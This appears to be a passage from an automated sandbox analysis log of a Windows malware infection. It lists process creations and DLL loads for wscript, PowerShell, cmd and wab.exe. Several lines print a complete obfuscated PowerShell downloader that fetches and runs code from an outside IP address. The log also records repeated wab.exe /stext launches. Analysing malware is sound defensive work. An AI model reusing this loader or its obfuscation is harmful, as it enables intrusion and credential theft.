cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
